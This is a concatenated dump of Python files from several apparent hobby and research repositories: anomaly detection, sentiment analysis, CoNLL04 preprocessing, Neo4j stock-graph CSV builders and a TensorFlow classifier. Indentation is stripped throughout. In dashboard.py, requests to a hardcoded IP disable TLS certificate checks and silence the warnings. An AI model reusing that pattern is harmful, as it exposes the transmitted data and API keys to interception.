r""" The modelling class takes input as dataframe or array and train Isolation Forest model
Paramteres
.........
data: DataFrame or array
input dataset
cols: list
list of parameters in input dataset
Attributes
----------
actual:array
actual label for test data
X: DataFrame or array
transformed values of input data
"""
def __init__(self, data):
self.data = data
self.cols = data.columns
def read_test(self, db):
""" Read test dataset for model validation"""
db.read_data('valid')
test = db.data
self.actual = test['Anomaly']
X = test[self.cols]
sc = joblib.load('scale')
self.X = sc.transform(X)
def isoforest(self, outliers_fraction=0.05, random_state=42, push_model=False): # modify the outlier
""" Train isolation forest
Parameters
----------
outliers_fraction: float between 0.01 to 0.5 (default=0.05)
percentage of anomalous available in input data
push_model: boolean (default=False)
return f_1 score if True else push model into repo
random_state: int (default=42)
"""
iso = IsolationForest(contamination=outliers_fraction, random_state=random_state)
md = iso.fit(self.data.values, None) # add .values to avoid the warning message (jojowei modification)
if push_model:
joblib.dump(self.cols, 'params')
joblib.dump(md, 'model')
return test(self, md)
def train(thread=False):
"""
Main function to perform training on input data
"""
if thread:
db = DUMMY()
else:
db = DATABASE('UEData')
db.read_data('train')
ps = PREPROCESS(db.data)
ps.process()
df = ps.data
mod = modelling(df)
mod.read_test(db)
scores = []
for of in np.arange(0.01, 0.4, 0.01):
scores.append(mod.isoforest(outliers_fraction=of))
opt_f1 = scores.index(max(scores)) + 1
mod.isoforest(outliers_fraction=opt_f1*0.01, push_model=True)
print("Optimum value of contamination : {}".format(opt_f1*0.01))
print('Training Ends : ')
def test(self, model):
pred = model.predict(self.X)
if -1 in pred:
pred = [1 if p == -1 else 0 for p in pred]
return f1_score(self.actual, pred)
```
#### File: ad/ad/dashboard.py
```python
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import json
def upload_to_dashboard(ue_name, du_name, degradation, timestamp):
ThingName="jojo_datatable"
ServiceName="Upload"
Appkey="<KEY>"
# Appkey is from thingworx, for accessing thingworx key
pre_url = 'https://192.168.3.11:5033/Thingworx/Things/'
url=pre_url+ThingName+'/Services/'+ServiceName
payload={
"UE" : ue_name,
"DU": du_name,
"Degradation": degradation,
"Timestamp": timestamp
}
headers={
"appKey": Appkey,
"Content-Type": "application/json"
}
r= requests.put(url, data=json.dumps(payload), headers=headers, verify=False)
def delete_dashboard_element(ue_name):
ThingName="jojo_datatable"
ServiceName="Deletion"
Appkey="<KEY>"
# Appkey is from thingworx, for accessing thingworx key
pre_url = 'https://192.168.3.11:5033/Thingworx/Things/'
url=pre_url+ThingName+'/Services/'+ServiceName
payload={
"UE" : ue_name
}
headers={
"appKey": Appkey,
"Content-Type": "application/json"
}
r= requests.put(url, data=json.dumps(payload), headers=headers, verify=False)
``` |
{
"source": "jojowither/Google-Map-Review",
"score": 3
} |
#### File: Google-Map-Review/src/sentiment.py
```python
from cnsenti import Sentiment
from cnsenti import Emotion
from hanziconv import HanziConv
import pandas as pd
import math
from termcolor import colored
def sentiment_analyze(text):
if isinstance (text, float) and math.isnan(text):
text = ''
text = HanziConv.toSimplified(text)
senti = Sentiment()
sentiment_result = senti.sentiment_count(text)
emotion = Emotion()
emotion_result = emotion.emotion_count(text)
emotion_result['樂'] = emotion_result.pop('乐')
emotion_result['懼'] = emotion_result.pop('惧')
emotion_result['惡'] = emotion_result.pop('恶')
emotion_result['驚'] = emotion_result.pop('惊')
return sentiment_result, emotion_result
if __name__ == "__main__":
filepath = '../data/newest_gm_reviews.csv'
reviews = pd.read_csv(filepath)
texts = reviews['caption']
sentiment_results = []
emotion_results = []
for text in texts:
sentiment_result, emotion_result = sentiment_analyze(text)
sentiment_results.append(sentiment_result)
emotion_results.append(emotion_result)
reviews['sentiment'] = sentiment_results
reviews['emotion'] = emotion_results
new_file = '../data/newest_gm_reviews_with_sent.csv'
reviews.to_csv(new_file, index=False)
print(colored('Finish', 'cyan'))
``` |
{
"source": "jojowither/Joint_Entity_and_Relation_Extraction",
"score": 2
} |
#### File: jojowither/Joint_Entity_and_Relation_Extraction/process_conll04.py
```python
import torch
import torch.utils.data as Data
import numpy as np
import copy
import json
import pickle
import os
root = 'data/'
dataset = 'conll04'
dataset_root = os.path.join(root, dataset)
root_data = os.path.join(dataset_root, 'conll04.corp')
def readfile(data):
with open(data, "r", encoding="utf-8") as f:
content = f.read().splitlines()
return content
def split_sentence(data):
num=0
max_len=0
record_len = {}
isspace = False
source_sentences = []
entity_seqs = []
relation_seqs = []
sentence = ''
entity_seq = ''
relation_seq = ''
for row_data in data:
try:
num_sent = int(row_data[0])
except IndexError:
if isspace==False:
isspace=True
else:
num+=1
isspace = False
source_sentences.append(sentence)
entity_seqs.append(entity_seq)
relation_seqs.append(relation_seq)
sentence = ''
entity_seq = ''
relation_seq = ''
else:
if len(row_data.split('\t'))==9:
sentence = sentence + row_data.split('\t')[5] + ' '
entity_seq = entity_seq + row_data.split('\t')[1] + ' '
if int(row_data.split('\t')[2])+1 > max_len:
max_len = int(row_data.split('\t')[2])+1
elif len(row_data.split('\t'))==3 :
relation_seq = relation_seq + row_data + ' '
# clean the space in the tail
for i, (s, e, r) in enumerate(zip(source_sentences, entity_seqs, relation_seqs)):
source_sentences[i] = s[:-1]
entity_seqs[i] = e[:-1]
relation_seqs[i] = r[:-1]
return source_sentences, entity_seqs, relation_seqs, max_len
def record_total_len(seq, max_len=200):
record_len = {i:0 for i in range(1, max_len+1)}
for s in seq:
record_len[len(s.split(' '))] += 1
return record_len
def filter_non_relation(source_sentences, entity_seqs, relation_seqs):
reserve_idx = []
for i,r in enumerate(relation_seqs):
if r!='':
reserve_idx.append(i)
filter_sentences = []
filter_entitys = []
filter_relations = []
for i in reserve_idx:
filter_sentences.append(source_sentences[i])
filter_entitys.append(entity_seqs[i])
filter_relations.append(relation_seqs[i])
return filter_sentences, filter_entitys, filter_relations
def process_seqs(source_sentences, entity_seqs, relation_seqs):
for idx, (sent, e_seq, r_seq) in enumerate(zip(source_sentences, entity_seqs, relation_seqs)):
# split to list
sent_l = sent.split(' ')
e_seq_l = e_seq.split(' ')
r_seq_l = r_seq.split(' ')
w2span_dict = {}
for i, s in enumerate(sent_l):
if ',' in s:
sent_l[i] = s.replace(',','COMMA')
if '-LRB-' in s:
sent_l[i] = s.replace('-LRB-','(')
if '-RRB-' in s:
sent_l[i] = s.replace('-RRB-',')')
# remove '.' in the word, like 'a.m.' -> 'am'
if '.' in s and len(s)>1:
sent_l[i] = s.replace('.','')
for i, s in enumerate(sent_l):
if '/' in s and e_seq_l[i]!='O':
w2span_dict[i] = s.split('/')
# remove the dot end of the word, if only appear dot dont remove
try :
s[-1]=='.'
except IndexError:
pass
# Does not affect
# it is '', and the raw input is '..' or '...'
else:
if s[-1]=='.' and len(s)>1:
sent_l[i] = s[:-1]
keys = sorted(w2span_dict.keys(), reverse=True)
for k in keys:
entity = e_seq_l[k]
del sent_l[k]
del e_seq_l[k]
B_idx = k
word_len = len(w2span_dict[k])
for i, w in enumerate(w2span_dict[k]):
sent_l.insert(k, w)
if i+1==word_len:
e_seq_l.insert(k, 'L-'+entity)
else:
e_seq_l.insert(k, 'I-'+entity)
k+=1
e_seq_l[B_idx] = 'B-'+entity
for i, e in enumerate(e_seq_l):
if e!='O' and e[0]!='B' and e[0]!='I' and e[0]!='L':
e_seq_l[i] = 'U-'+e_seq_l[i]
if e=='Loc':
e_seq_l[i] = 'U-'+e_seq_l[i]
record_loc = {}
previous_idx = 0
count_itag = 0
# Record: Previous starting position: {now starting position, now ending position}
for now_idx, e in enumerate(e_seq_l):
if e[0]=='U' or e[0]=='B':
record_loc[now_idx-count_itag] = {'start':now_idx, 'end':now_idx}
previous_idx = now_idx-count_itag
elif e[0]=='I':
count_itag += 1
elif e[0]=='L':
count_itag += 1
record_loc[previous_idx]['end'] = now_idx
now_r = 0
r_list = [' ' for _ in range(len(sent_l))]
if r_seq_l==[''] :
relation_seqs[idx] = r_list
else:
for triple_r in r_seq_l:
_a = int(triple_r.split('\t')[0])
_b = int(triple_r.split('\t')[1])
rel = triple_r.split('\t')[2]
# triple in A
end_address = record_loc[_a]['end']
if r_list[end_address]==' ':
r_list[end_address] = [rel+'-'+str(now_r)+'-'+'A']
else:
r_list[end_address].append(rel+'-'+str(now_r)+'-'+'A')
# triple in B
end_address = record_loc[_b]['end']
if r_list[end_address]==' ':
r_list[end_address] = [rel+'-'+str(now_r)+'-'+'B']
else:
r_list[end_address].append(rel+'-'+str(now_r)+'-'+'B')
now_r += 1
# Remove the COMMA in the entity
for i, (s,e) in enumerate(zip(sent_l, e_seq_l)):
# if s=='COMMA' and e!='O':
# del sent_l[i]
# del e_seq_l[i]
# del r_list[i]
if s=='' :
sent_l[i] = '.'
# del sent_l[i]
# del e_seq_l[i]
# del r_list[i]
# if s=='--' :
# del sent_l[i]
# del e_seq_l[i]
# del r_list[i]
source_sentences[idx] = ' '.join(sent_l)
entity_seqs[idx] = ' '.join(e_seq_l)
relation_seqs[idx] = r_list
return source_sentences, entity_seqs, relation_seqs
# concatenate the sentence, entity and relation to the list
def concat_s_e_r(sents, ent_seqs, rel_seqs):
# record the sentence, entity and relation
all_combine_list = []
for idx, (sent, e_seq, r_seq) in enumerate(zip(sents, ent_seqs, rel_seqs)):
sent_l = sent.split(' ')
e_seq_l = e_seq.split(' ')
data_represent = ''
for s,e,r in zip(sent_l, e_seq_l, r_seq):
if type(r) is list:
r = ' '.join(r)
data_represent += s+' '+e+' '+r+'\n'
all_combine_list.append(data_represent)
return all_combine_list
data = readfile(root_data)
source_sentences, entity_seqs, relation_seqs, max_len = split_sentence(data)
#======filter non relation sequences======
source_sentences, entity_seqs, relation_seqs = filter_non_relation(source_sentences, entity_seqs, relation_seqs)
# ========================================
source_sentences, entity_seqs, relation_seqs = process_seqs(source_sentences, entity_seqs, relation_seqs)
record_len = record_total_len(source_sentences)
all_combine_data = concat_s_e_r(source_sentences, entity_seqs, relation_seqs)
print('The numbers of data', len(all_combine_data))
test_size = int(len(all_combine_data)*0.2)
dev_size = int((len(all_combine_data)-test_size)*0.1)
train_size = len(all_combine_data)-dev_size-test_size
train_dataset, dev_dataset, test_dataset = Data.random_split(all_combine_data, [train_size, dev_size, test_size])
print('train_dataset', len(train_dataset))
print('dev_dataset', len(dev_dataset))
print('test_dataset', len(test_dataset))
with open(os.path.join(dataset_root, 'training_set.txt'), "w") as f:
for item in train_dataset:
f.write("%s\n" % item)
with open(os.path.join(dataset_root, 'dev_set.txt'), "w") as f:
for item in dev_dataset:
f.write("%s\n" % item)
with open(os.path.join(dataset_root, 'test_set.txt'), "w") as f:
for item in test_dataset:
f.write("%s\n" % item)
``` |
{
"source": "jojowither/Question-Answer-Project",
"score": 3
} |
#### File: Question-Answer-Project/web/request_test.py
```python
import requests
import json
import yaml
from pprint import pprint
import time
with open('config.yaml', 'r') as stream:
config = yaml.load(stream, Loader=yaml.FullLoader)
def time_count_wrapper(func):
def time_count(*args, **kwargs):
ts = time.time()
response = func(*args, **kwargs)
te = time.time()
print(f'\n{"="*40}')
print (f"Time consume: {te-ts:.3f} s")
print(f'{"="*40}\n')
return response
return time_count
@time_count_wrapper
def resquest_post(url, data):
response = requests.post(url=f"{url}/predictions/qa_server", data=data)
return response
def main():
context = input('Type the text: ')
question_list = []
while True:
question = input('Type the question (type "exit" to close): ')
if question=='exit':
break
question_list.append(question)
t = time.localtime()
timestamp = time.strftime('%Y%m%d%H%M%S', t)
profile = {}
profile['context'] = context
if question_list==[]:
profile["questions"] = []
else:
profile["questions"] = []
for question in question_list:
profile["questions"].append({"content":question,
"ID":f"{str(9999)}-{question}"})
payload = json.dumps(profile)
response = resquest_post(url=config['BASE_URL'], data=payload)
data = response.json()
print()
print('The response:')
pprint(data)
print()
# print(json.dumps(data, indent=4, ensure_ascii=False))
if __name__ == "__main__":
main()
``` |
{
"source": "jojowither/Taiwan-Stock-Knowledge-Graph",
"score": 3
} |
#### File: Taiwan-Stock-Knowledge-Graph/src/build_import_csv.py
```python
import csv
import hashlib
import os
from pathlib import Path
import twstock
def get_md5(string):
"""
Get md5 according to the string
"""
byte_string = string.encode("utf-8")
md5 = hashlib.md5()
md5.update(byte_string)
result = md5.hexdigest()
return result
def build_person(executive_prep, person_import):
"""
Create an 'person' file in csv format that can be imported into Neo4j.
format -> person_id:ID,name,:LABEL
label -> Person
"""
print(f'Writing to {person_import.name} file...')
with open(executive_prep, 'r', encoding='utf-8') as file_prep, \
open(person_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['person_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
person_set = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
person_set.add(row[0])
for person in person_set:
# generate md5 according to 'name'
person_id = get_md5(person)
info = [person_id, person, 'Person']
file_import_csv.writerow(info)
print('- done.')
def build_stock(stock_prep, stock_import):
"""
Create an 'stock' file in csv format that can be imported into Neo4j.
format -> company_id:ID,name,code,:LABEL
label -> Stock
"""
print(f'Writing to {stock_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep,\
open(stock_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['stock_id:ID', 'name', 'code', 'market', ':LABEL']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
info = [row[0], row[2], row[0], row[4], 'Stock']
file_import_csv.writerow(info)
print('- done.')
def build_stock_type(stock_prep, stock_type_import):
"""
Create an 'stock_type' file in csv format that can be imported into Neo4j.
format -> stocktype_id:ID,name,:LABEL
label -> StockType
"""
print(f'Writing to {stock_type_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep,\
open(stock_type_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['stocktype_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
stock_types = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
stock_types.add(row[1])
for stock_type in stock_types:
stock_type_id = get_md5(stock_type)
info = [stock_type_id, stock_type, 'StockType']
file_import_csv.writerow(info)
print('- done.')
def build_industry(stock_prep, industry_import):
"""
Create an 'industry' file in csv format that can be imported into Neo4j.
format -> industry_id:ID,name,:LABEL
label -> Industry
"""
print(f'Writing to {industry_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep,\
open(industry_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['industry_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
industries = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
industry = row[3] if row[3] != '' else '無'
industries.add(industry)
for industry in industries:
industry_id = get_md5(industry)
info = [industry_id, industry, 'Industry']
file_import_csv.writerow(info)
print('- done.')
def build_concept(concept_prep, concept_import):
"""
Create an 'concept' file in csv format that can be imported into Neo4j.
format -> concept_id:ID,name,:LABEL
label -> Concept
"""
print(f'Writing to {concept_import.name} file...')
with open(concept_prep, 'r', encoding='utf-8') as file_prep,\
open(concept_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['concept_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
concepts = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
concept = row[0]
concepts.add(concept)
for concept in concepts:
concept_id = get_md5(concept)
info = [concept_id, concept, 'Concept']
file_import_csv.writerow(info)
print('- done.')
def bulid_dealer(dealer_prep, dealer_import):
"""
Create an 'dealer' file in csv format that can be imported into Neo4j.
format -> dealer_id:ID,name,:LABEL
label -> Dealer
"""
print(f'Writing to {dealer_prep.name} file...')
with open(dealer_prep, 'r', encoding='utf-8') as file_prep, \
open(dealer_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['dealer_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
dealers = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
dealers.add(row[0])
for dealer in dealers:
# generate md5 according to 'name'
dealer_id = get_md5(dealer)
info = [dealer_id, dealer, 'Dealer']
file_import_csv.writerow(info)
print('- done.')
def build_person_stock(executive_prep, relation_import):
"""Create an 'person_stock' file in csv format that can be imported into Neo4j.
format -> :START_ID,job,stock_num,:END_ID,:TYPE
person stock
type -> employ_of
"""
print(f'Writing to {relation_import.name} file...')
with open(executive_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', 'jobs', 'stock_num:int', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = get_md5(row[0])
end_id = row[1] # code
relation = [start_id, row[2], row[3], end_id, 'employ_of']
file_import_csv.writerow(relation)
print('- done.')
# build stock and stock_type
def build_stock_st(stock_prep, relation_import):
"""Create an 'stock_st' file in csv format that can be imported into Neo4j.
format -> :START_ID,:END_ID,:TYPE
stock stock_type
type -> type_of
"""
print(f'Writing to {relation_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = row[0] # code
end_id = get_md5(row[1])
relation = [start_id, end_id, 'type_of']
file_import_csv.writerow(relation)
print('- done.')
def build_stock_industry(stock_prep, relation_import):
"""Create an 'stock_industry' file in csv format that can be imported into Neo4j.
format -> :START_ID,:END_ID,:TYPE
stock industry
type -> industry_of
"""
print(f'Writing to {relation_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = row[0] # code
industry = row[3] if row[3] != '' else '無'
end_id = get_md5(industry)
relation = [start_id, end_id, 'industry_of']
file_import_csv.writerow(relation)
print('- done.')
def build_stock_concept(concept_prep, relation_import):
"""Create an 'stock_concept' file in csv format that can be imported into Neo4j.
format -> :START_ID,:END_ID,:TYPE
stock concept
type -> concept_of
"""
print(f'Writing to {relation_import.name} file...')
with open(concept_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = row[1]
concept = row[0]
end_id = get_md5(concept)
# Maybe the twstock didn't update the new stcok
if start_id not in twstock.codes:
continue
relation = [start_id, end_id, 'concept_of']
file_import_csv.writerow(relation)
print('- done.')
def build_dealer_stock(executive_prep, relation_import):
"""Create an 'dealer_stock' file in csv format that can be imported into Neo4j.
format -> :START_ID,amount,:END_ID,:TYPE
dealer stock
type -> buy_or_sell
"""
print(f'Writing to {relation_import.name} file...')
with open(executive_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', 'amount:int', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = get_md5(row[0])
end_id = row[1] # code
relation = [start_id, row[2], end_id, 'buy_or_sell']
file_import_csv.writerow(relation)
print('- done.')
if __name__ == '__main__':
prep_path = '../data/'
import_path = '../data/import'
if not os.path.exists(import_path):
os.makedirs(import_path)
# Node
build_person(Path(prep_path)/'executive_prep.csv',
Path(import_path)/'person.csv')
build_stock(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'stock.csv')
build_stock_type(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'stock_type.csv')
build_industry(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'industry.csv')
build_concept(Path(prep_path)/'concept_prep.csv',
Path(import_path)/'concept.csv')
bulid_dealer(Path(prep_path)/'dealer_prep.csv',
Path(import_path)/'dealer.csv')
# Relation
build_person_stock(Path(prep_path)/'executive_prep.csv',
Path(import_path)/'person_stock.csv')
build_stock_st(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'stock_st.csv')
build_stock_industry(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'stock_industry.csv')
build_stock_concept(Path(prep_path)/'concept_prep.csv',
Path(import_path)/'stock_concept.csv')
build_dealer_stock(Path(prep_path)/'dealer_prep.csv',
Path(import_path)/'dealer_stock.csv')
``` |
{
"source": "Jojoxiao/Machine-Learning-for-Beginner-by-Python3",
"score": 3
} |
#### File: BPNN/BPNN_Classify/TensorFlow_BPNN_Classify.py
```python
import tensorflow as tf
import BPNN_Classify_Data as bpd
import matplotlib.pyplot as plt
import numpy as np
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 中文字体名称
mpl.rcParams['axes.unicode_minus'] = False # 显示负号
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# 设置正确率的刻度与子刻度
y_toge = MultipleLocator(0.02) # 将y轴主刻度标签设置为0.1的倍数
y_son = MultipleLocator(0.01) # 将此y轴次刻度标签设置为0.01的倍数
# 分类数
countclass = 2
'''第二部分函数'''
# 根据输出的结果判断类别的函数
def judge(ydata):
maxnum = np.max(ydata, axis=1)
lastdata = []
for ii in range(len(ydata)):
maxindex = list(ydata[ii]).index(maxnum[ii])
fu = [0] * len(ydata[0])
fu[maxindex] = 1
lastdata.append(fu)
return np.array(lastdata)
# 根据输出的结果以及真实结果输出分类的效果
def outvsreal(outdata, realdata):
subdata = outdata - realdata
sundata = np.sum(np.abs(subdata), axis=1)
correct = list(sundata).count(0)
return correct / len(outdata)
'''第三部分: 基于TensorFlow构建训练函数'''
# 创建激活函数
def activate(input_layer, weights, biases, actfunc):
layer = tf.add(tf.matmul(input_layer, weights), biases)
if actfunc == 'relu':
return tf.nn.relu(layer)
elif actfunc == 'tanh':
return tf.nn.tanh(layer)
elif actfunc == 'sigmoid':
return tf.nn.sigmoid(layer)
elif actfunc == 'linear':
return layer
# 权重初始化的方式和利用激活函数的关系很大
# sigmoid: xavir tanh: xavir relu: he
# 构建训练函数
def Ten_train(xdata, ydata, addxdata, addydata, kcount, hiddenlayers=3, hiddennodes=100, \
learn_rate=0.02, itertimes=20, batch_size=200, activate_func='tanh'):
# 开始搭建神经网络
Input_Dimen = len(xdata[0])
Unit_Layers = [Input_Dimen] + [hiddennodes] * hiddenlayers + [len(ydata[0])] # 输入的维数,隐层的神经数,输出的维数1
# 创建占位符
x_data = tf.placeholder(shape=[None, Input_Dimen], dtype=tf.float32, name='x_data')
y_target = tf.placeholder(shape=[None, len(ydata[0])], dtype=tf.float32)
# 实现动态命名变量
VAR_NAME = locals()
for jj in range(hiddenlayers + 1):
VAR_NAME['weight%s' % jj] = tf.Variable(np.random.rand(Unit_Layers[jj], Unit_Layers[jj + 1]) / np.sqrt(Unit_Layers[jj]), \
dtype=tf.float32, name='Weight%s' % jj) # sigmoid tanh
# VAR_NAME['weight%s'%jj] = tf.Variable(np.random.rand(Unit_Layers[jj], Unit_Layers[jj + 1]),dtype=tf.float32, \name='weight%s' % jj) \/ np.sqrt(Unit_Layers[jj] / 2) # relu
VAR_NAME['bias%s' % jj] = tf.Variable(tf.random_normal([Unit_Layers[jj + 1]], stddev=10), dtype=tf.float32, name='Bias%s' % jj)
if jj == 0:
VAR_NAME['ooutda%s' % jj] = activate(x_data, eval('weight%s' % jj), eval('bias%s' % jj),
actfunc=activate_func)
elif jj == hiddenlayers:
VAR_NAME['ooutda%s' % jj] = activate(eval('ooutda%s' % (jj - 1)), eval('weight%s' % jj),\
eval('bias%s' % jj), actfunc='linear') # 因此最后一层采用线性激活函数
else:
VAR_NAME['ooutda%s' % jj] = activate(eval('ooutda%s' % (jj - 1)), eval('weight%s' % jj),\
eval('bias%s' % jj), actfunc=activate_func)
# 需要对输出进行softmax计算
uuu = tf.nn.softmax(eval('ooutda%s' % (hiddenlayers)))
# 交叉熵函数
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_target, logits=eval('ooutda%s' % (hiddenlayers))))
# 计算精确度需要
accu = eval('ooutda%s' % hiddenlayers)
# 优化的方法
# my_opt = tf.train.GradientDescentOptimizer(learn_rate)
my_opt = tf.train.AdamOptimizer(learn_rate)
train_step = my_opt.minimize(loss)
# 初始化
init = tf.global_variables_initializer()
loss_vec = [] # 训练误差
loss_vec_add = [] # 验证误差
acc_vec = [] # 训练精确度
acc_vec_add = [] # 验证精确度
# 需要保存的权重以及偏置
graph = tf.get_default_graph()
saver = tf.train.Saver(max_to_keep=1)
sess = tf.Session()
# 存储精确率的字典
accudict = {}
accunum = 0
sess.run(init)
for i in range(itertimes): # 在总共的迭代次数中选择最高的(验证正确率+训练精确率)
for jj in range(int(len(xdata) / batch_size)):
rand_index = np.random.choice(len(xdata), size=batch_size, replace=False)
rand_x = xdata[rand_index]
rand_y = ydata[rand_index]
# 开始训练
sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y})
# 训练误差
temp_loss = sess.run(loss, feed_dict={x_data: xdata, y_target: ydata})
# 存储训练误差
loss_vec.append(temp_loss)
# 验证误差
temp_loss_add = sess.run(loss, feed_dict={x_data: addxdata, y_target: addydata})
# 存储验证误差
loss_vec_add.append(temp_loss_add)
# 训练精确率
acc_ru = sess.run(accu, feed_dict={x_data: xdata})
acc_rughy_train = outvsreal(judge(acc_ru), ydata)
# 存储
acc_vec.append(acc_rughy_train)
# 验证精确率
acu = sess.run(accu, feed_dict={x_data: addxdata})
acc_rughy = outvsreal(judge(acu), addydata)
# 存储
acc_vec_add.append(acc_rughy)
print('%s代误差: [训练:%.4f, 验证:%.4f], 正确率: [训练:%.4f, 验证:%.4f]' % (i, temp_loss, temp_loss_add, \
acc_rughy_train, acc_rughy))
accudict[i] = [acc_rughy_train, acc_rughy]
# # 判断提前退出 , 验证数据集正确率连续三下降
# if len(acc_vec_add) >= 4:
# # 判断连续三次下降
# edlist = acc_vec_add[-4:-1]
# delist = acc_vec_add[-3:]
# sublist = np.array(edlist) - np.array(delist)
# if np.all(sublist > 0):
# break
# 为了避免,陷入局部小值,当运行一定代数后,如果精确度未达到某值,则重新训练
if i > 30 and max(acc_vec) - min(acc_vec) < 0.3:
tf.reset_default_graph()
sess.close()
return False
# 在所有的循环次数中,找到综合精确度最高的一次,保存参数
zongheaccu = 0.1 * acc_rughy_train + 0.9 * acc_rughy
if zongheaccu > accunum:
accunum = zongheaccu
# 保存模型
saver.save(sess, './gu/%smodel' % kcount, global_step=i) #注意路径
sign = max(accudict.items(), key=lambda d: 0.1 * d[1][0] + 0.9 * d[1][1])[0]
print('%s 折运行完毕,模型已经保存,最优的是%s代' % (kcount, sign))
return loss_vec[: sign + 1], loss_vec_add[: sign + 1], acc_vec[: sign + 1], acc_vec_add[: sign + 1], sign, hiddenlayers
'''第四部分:数据'''
DDatadict = bpd.kfold_train_datadict
# 将数据分为输入数据以及输出数据
def divided(data, cgu=countclass):
indata = data[:, :-cgu]
outdata = data[:, -cgu:]
return indata, outdata
# 将数据字典的值转化为训练输入,训练输出,验证输入、验证输出
def transall(listdata, count=countclass):
trin, trout = divided(listdata[0], count)
yanin, yanout = divided(listdata[1], count)
return trin, trout, yanin, yanout
'''第五部分:最终的运行程序'''
if __name__ == "__main__":
# 存储正确率 训练
corrsave_train = []
# 存储正确率 验证
corrsave_add = []
# 存储测试集合的正确率
corrsave_test = []
TEST_In, TEST_Out = divided(bpd.Test_data.values)
# 开始K折交叉验证
for fold in DDatadict:
TRAIN_In, TRAIN_Out, ADD_In, ADD_Out = transall(DDatadict[fold])
while 1:
bpnn = Ten_train(TRAIN_In, TRAIN_Out, ADD_In, ADD_Out, fold)
if bpnn:
break
# 下载刚才已经保存的模型
#tf.reset_default_graph()
graph = tf.train.import_meta_graph("./gu/%smodel-%s.meta" % (fold, bpnn[4]))
ses = tf.Session()
graph.restore(ses, tf.train.latest_checkpoint('./'))
op_to_restore = tf.get_default_graph().get_tensor_by_name("Add_%s:0" % bpnn[5])
w1 = tf.get_default_graph().get_tensor_by_name("x_data:0")
feed_dict = {w1: TEST_In}
dgsio = ses.run(op_to_restore, feed_dict)
# 测试数据集正确率
add_on_op = outvsreal(judge(dgsio), TEST_Out)
print('第%s折测试正确率为' % fold, add_on_op)
# 清空图
ses.close()
tf.reset_default_graph()
# 测试添加
corrsave_test.append(add_on_op)
# 训练正确率添加
corrsave_train.append(bpnn[2][-1])
# 验证正确率添加
corrsave_add.append(bpnn[3][-1])
# 绘制训练数据集与验证数据集的正确率以及误差曲线
fig, ax1 = plt.subplots()
ax1.set_xlabel('代数')
ax1.set_ylabel('误差', color='r')
plt.plot(list(range(len(bpnn[0]))), bpnn[0], label='训练', color='r', marker='*', linewidth=2)
